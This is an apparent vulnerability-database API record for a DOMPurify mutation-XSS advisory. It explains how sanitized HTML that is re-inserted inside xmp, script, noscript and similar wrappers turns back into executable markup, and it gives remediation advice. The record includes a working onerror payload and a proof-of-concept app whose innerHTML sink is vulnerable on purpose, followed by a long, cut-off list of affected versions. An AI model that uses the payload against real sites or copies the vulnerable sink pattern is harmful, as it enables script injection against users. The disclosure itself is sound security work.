Vulnerability Instance
Lookup for vulnerabilities affecting packages.
GET /api/vulnerabilities/23788?format=api
{ "url": "http://public2.vulnerablecode.io/api/vulnerabilities/23788?format=api", "vulnerability_id": "VCID-ter4-v1bu-7fan", "summary": "DOMPurify is vulnerable to mutation-XSS via Re-Contextualization\n## Description\n\nA mutation-XSS (mXSS) condition was confirmed when sanitized HTML is reinserted into a new parsing context using `innerHTML` and special wrappers. The vulnerable wrappers confirmed in browser behavior are `script`, `xmp`, `iframe`, `noembed`, `noframes`, and `noscript`. The payload remains seemingly benign after `DOMPurify.sanitize()`, but mutates during the second parse into executable markup with an event handler, enabling JavaScript execution in the client (`alert(1)` in the PoC).\n\n\n## Vulnerability\n\nThe root cause is context switching after sanitization: sanitized output is treated as trusted and concatenated into a wrapper string (for example, `<xmp> ... </xmp>` or other special wrappers) before being reparsed by the browser. In this flow, attacker-controlled text inside an attribute (for example `</xmp>` or equivalent closing sequences for each wrapper) closes the special parsing context early and reintroduces attacker markup (`<img ... onerror=...>`) outside the original attribute context. DOMPurify sanitizes the original parse tree, but the application performs a second parse in a different context, reactivating dangerous tokens (classic mXSS pattern).\n\n## PoC\n\n1. Start the PoC app:\n```bash\nnpm install\nnpm start\n```\n\n2. Open `http://localhost:3001`.\n3. Set `Wrapper en sink` to `xmp`.\n4. Use payload:\n```html\n <img src=x alt=\"</xmp><img src=x onerror=alert('expoc')>\">\n```\n\n5. Click `Sanitize + Render`.\n6. Observe:\n- `Sanitized response` still contains the `</xmp>` sequence inside `alt`.\n- The sink reparses to include `<img src=\"x\" onerror=\"alert('expoc')\">`.\n- `alert('expoc')` is triggered.\n7. Files:\n- index.html\n\n```html\n<!doctype html>\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n <title>expoc - DOMPurify SSR PoC</title>\n <style>\n :root {\n --bg: #f7f8fb;\n --panel: #ffffff;\n --line: #d8dce6;\n --text: #0f172a;\n --muted: #475569;\n --accent: #0ea5e9;\n }\n\n * {\n box-sizing: border-box;\n }\n\n body {\n margin: 0;\n font-family: \"SF Mono\", Menlo, Consolas, monospace;\n color: var(--text);\n background: radial-gradient(circle at 10% 0%, #e0f2fe 0%, var(--bg) 60%);\n }\n\n main {\n max-width: 980px;\n margin: 28px auto;\n padding: 0 16px 20px;\n }\n\n h1 {\n margin: 0 0 10px;\n font-size: 1.45rem;\n }\n\n p {\n margin: 0;\n color: var(--muted);\n }\n\n .grid {\n display: grid;\n gap: 14px;\n margin-top: 16px;\n }\n\n .card {\n background: var(--panel);\n border: 1px solid var(--line);\n border-radius: 12px;\n padding: 14px;\n }\n\n label {\n display: block;\n margin-bottom: 7px;\n font-size: 0.85rem;\n color: var(--muted);\n }\n\n textarea,\n input,\n select,\n button {\n width: 100%;\n border: 1px solid var(--line);\n border-radius: 8px;\n padding: 9px 10px;\n font: inherit;\n background: #fff;\n }\n\n textarea {\n min-height: 110px;\n resize: vertical;\n }\n\n .row {\n display: grid;\n grid-template-columns: 1fr 230px;\n gap: 12px;\n }\n\n button {\n cursor: pointer;\n background: var(--accent);\n color: #fff;\n border-color: #0284c7;\n }\n\n #sink {\n min-height: 90px;\n border: 1px dashed #94a3b8;\n border-radius: 8px;\n padding: 10px;\n background: #f8fafc;\n }\n\n pre {\n margin: 0;\n white-space: pre-wrap;\n word-break: break-word;\n }\n\n .note {\n margin-top: 8px;\n font-size: 0.85rem;\n }\n\n .status-grid {\n display: grid;\n grid-template-columns: repeat(auto-fit, minmax(180px, 1fr));\n gap: 8px;\n margin-top: 10px;\n }\n\n .status-item {\n border: 1px solid var(--line);\n border-radius: 8px;\n padding: 8px 10px;\n font-size: 0.85rem;\n background: #fff;\n }\n\n .status-item.vuln {\n border-color: #ef4444;\n background: #fef2f2;\n }\n\n .status-item.safe {\n border-color: #22c55e;\n background: #f0fdf4;\n }\n\n @media (max-width: 760px) {\n .row {\n grid-template-columns: 1fr;\n }\n }\n </style>\n </head>\n <body>\n <main>\n <h1>expoc - DOMPurify Server-Side PoC</h1>\n <p>\n Flujo: input -> POST /sanitize (Node + jsdom + DOMPurify) -> render vulnerable con innerHTML.\n </p>\n\n <div class=\"grid\">\n <section class=\"card\">\n <label for=\"payload\">Payload</label>\n <textarea id=\"payload\"><img src=x alt=\"</script><img src=x onerror=alert('expoc')>\"></textarea>\n <div class=\"row\" style=\"margin-top: 10px;\">\n <div>\n <label for=\"wrapper\">Wrapper en sink</label>\n <select id=\"wrapper\">\n <option value=\"div\">div</option>\n <option value=\"textarea\">textarea</option>\n <option value=\"title\">title</option>\n <option value=\"style\">style</option>\n <option value=\"script\" selected>script</option>\n <option value=\"xmp\">xmp</option>\n <option value=\"iframe\">iframe</option>\n <option value=\"noembed\">noembed</option>\n <option value=\"noframes\">noframes</option>\n <option value=\"noscript\">noscript</option>\n </select>\n </div>\n <div style=\"display:flex;align-items:end;\">\n <button id=\"run\" type=\"button\">Sanitize + Render</button>\n </div>\n </div>\n <p class=\"note\">Se usa render vulnerable: <code>sink.innerHTML = '<wrapper>' + sanitized + '</wrapper>'</code>.</p>\n <div class=\"status-grid\">\n <div class=\"status-item vuln\">script (vulnerable)</div>\n <div class=\"status-item vuln\">xmp (vulnerable)</div>\n <div class=\"status-item vuln\">iframe (vulnerable)</div>\n <div class=\"status-item vuln\">noembed (vulnerable)</div>\n <div class=\"status-item vuln\">noframes (vulnerable)</div>\n <div class=\"status-item vuln\">noscript (vulnerable)</div>\n <div class=\"status-item safe\">div (no vulnerable)</div>\n <div class=\"status-item safe\">textarea (no vulnerable)</div>\n <div class=\"status-item safe\">title (no vulnerable)</div>\n <div class=\"status-item safe\">style (no vulnerable)</div>\n </div>\n </section>\n\n <section class=\"card\">\n <label>Sanitized response</label>\n <pre id=\"sanitized\">(empty)</pre>\n </section>\n\n <section class=\"card\">\n <label>Sink</label>\n <div id=\"sink\"></div>\n </section>\n </div>\n </main>\n\n <script>\n const payload = document.getElementById('payload');\n const wrapper = document.getElementById('wrapper');\n const run = document.getElementById('run');\n const sanitizedNode = document.getElementById('sanitized');\n const sink = document.getElementById('sink');\n\n run.addEventListener('click', async () => {\n const response = await fetch('/sanitize', {\n method: 'POST',\n headers: { 'Content-Type': 'application/json' },\n body: JSON.stringify({ input: payload.value })\n });\n\n const data = await response.json();\n const sanitized = data.sanitized || '';\n const w = wrapper.value;\n\n sanitizedNode.textContent = sanitized;\n sink.innerHTML = '<' + w + '>' + sanitized + '</' + w + '>';\n });\n </script>\n </body>\n</html>\n```\n\n- server.js\n\n```js\nconst express = require('express');\nconst path = require('path');\nconst { JSDOM } = require('jsdom');\nconst createDOMPurify = require('dompurify');\n\nconst app = express();\nconst port = process.env.PORT || 3001;\n\nconst window = new JSDOM('').window;\nconst DOMPurify = createDOMPurify(window);\n\napp.use(express.json());\napp.use(express.static(path.join(__dirname, 'public')));\n\napp.get('/health', (_req, res) => {\n res.json({ ok: true, service: 'expoc' });\n});\n\napp.post('/sanitize', (req, res) => {\n const input = typeof req.body?.input === 'string' ? req.body.input : '';\n const sanitized = DOMPurify.sanitize(input);\n res.json({ sanitized });\n});\n\napp.listen(port, () => {\n console.log(`expoc running at http://localhost:${port}`);\n});\n```\n\n- package.json\n\n```json\n{\n \"name\": \"expoc\",\n \"version\": \"1.0.0\",\n \"main\": \"server.js\",\n \"scripts\": {\n \"test\": \"echo \\\"Error: no test specified\\\" && exit 1\",\n \"start\": \"node server.js\",\n \"dev\": \"node server.js\"\n },\n \"keywords\": [],\n \"author\": \"\",\n \"license\": \"ISC\",\n \"description\": \"\",\n \"dependencies\": {\n \"dompurify\": \"^3.3.1\",\n \"express\": \"^5.2.1\",\n \"jsdom\": \"^28.1.0\"\n }\n}\n```\n\n## Evidence\n\n- PoC\n\n[daft-video.webm](https://github.com/user-attachments/assets/499a593d-0241-4ab8-95a9-cf49a00bda90)\n\n- XSS triggered\n<img width=\"2746\" height=\"1588\" alt=\"daft-img\" src=\"https://github.com/user-attachments/assets/1f463c14-d5a3-4c93-94e4-12d2d02c7d15\" />\n\n## Why This Happens\nThis is a mutation-XSS pattern caused by a parse-context mismatch:\n\n- Parse 1 (sanitization phase): input is interpreted under normal HTML parsing rules.\n- Parse 2 (sink phase): sanitized output is embedded into a wrapper that changes parser state (`xmp` raw-text behavior).\n- Attacker-controlled sequence (`</xmp>`) gains structural meaning in parse 2 and alters DOM structure.\n\nSanitization is not a universal guarantee across all future parsing contexts. The sink design reintroduces risk.\n\n## Remediation Guidance\n1. Do not concatenate sanitized strings into new HTML wrappers followed by `innerHTML`.\n2. Keep the rendering context stable from sanitize to sink.\n3. Prefer DOM-safe APIs (`textContent`, `createElement`, `setAttribute`) over string-based HTML composition.\n4. If HTML insertion is required, sanitize as close as possible to final insertion context and avoid wrapper constructs with raw-text semantics (`xmp`, `script`, etc.).\n5. Add regression tests for context-switch/mXSS payloads (including `</xmp>`, `</noscript>`, similar parser-breakout markers).\n\nReported by Oscar Uribe, Security Researcher at Fluid Attacks. Camilo Vera and Cristian Vargas from the Fluid Attacks Research Team have identified a mXSS via Re-Contextualization in DomPurify 3.3.1.\n\nFollowing Fluid Attacks [Disclosure Policy](https://fluidattacks.com/advisories/policy), if this report corresponds to a vulnerability and the conditions outlined in the policy are met, this advisory will be published on the website over the next few days (the timeline may vary depending on maintainers' willingness to attend to and respond to this report) at the following URL: https://fluidattacks.com/advisories/daft\n\nAcknowledgements: [Camilo Vera](https://github.com/caverav/) and [Cristian Vargas](https://github.com/tachote).", "aliases": [ { "alias": "GHSA-h8r8-wccr-v5f2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/66795?format=api", "purl": "pkg:npm/dompurify@3.3.2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.3.2" } ], "affected_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/193666?format=api", "purl": "pkg:npm/dompurify@0.4.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.4.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/193667?format=api", "purl": "pkg:npm/dompurify@0.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.4.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/193668?format=api", "purl": "pkg:npm/dompurify@0.4.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.4.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/193669?format=api", "purl": "pkg:npm/dompurify@0.4.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.4.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/193670?format=api", "purl": "pkg:npm/dompurify@0.4.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.4.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/193671?format=api", "purl": "pkg:npm/dompurify@0.6.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.6.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/193672?format=api", "purl": "pkg:npm/dompurify@0.6.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.6.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/193673?format=api", "purl": "pkg:npm/dompurify@0.6.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.6.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/193674?format=api", "purl": "pkg:npm/dompurify@0.6.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.6.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/193675?format=api", "purl": "pkg:npm/dompurify@0.6.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.6.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/193676?format=api", "purl": "pkg:npm/dompurify@0.6.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.6.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/193677?format=api", "purl": "pkg:npm/dompurify@0.6.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.6.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/193678?format=api", "purl": "pkg:npm/dompurify@0.6.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.6.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/193679?format=api", "purl": "pkg:npm/dompurify@0.7.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.7.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/193680?format=api", "purl": "pkg:npm/dompurify@0.7.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.7.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/193681?format=api", "purl": "pkg:npm/dompurify@0.7.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.7.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/193682?format=api", "purl": "pkg:npm/dompurify@0.7.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.7.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/193683?format=api", "purl": "pkg:npm/dompurify@0.7.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.7.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/193684?format=api", "purl": "pkg:npm/dompurify@0.8.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.8.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/193685?format=api", "purl": "pkg:npm/dompurify@0.8.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.8.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/193686?format=api", "purl": "pkg:npm/dompurify@0.8.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.8.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/193687?format=api", "purl": "pkg:npm/dompurify@0.8.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": "VCID-ttsq-pq54-g7fg" }, { "vulnerability": "VCID-vbs9-gben-9kgc" }, { "vulnerability": "VCID-vzq7-t235-ukd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.8.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/193688?format=api", "purl": "pkg:npm/dompurify@0.8.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4a9k-89d3-8yes" }, { "vulnerability": "VCID-4qke-xfet-xue6" }, { "vulnerability": "VCID-9517-d2c6-9fhx" }, { "vulnerability": "VCID-d7qb-cwzz-3yh6" }, { "vulnerability": "VCID-gmsu-xfke-47bg" }, { "vulnerability": "VCID-mebp-4rfu-vqcq" }, { "vulnerability": "VCID-prz4-pcsj-gfh2" }, { "vulnerability": "VCID-ter4-v1bu-7fan" }, { "vulnerability": 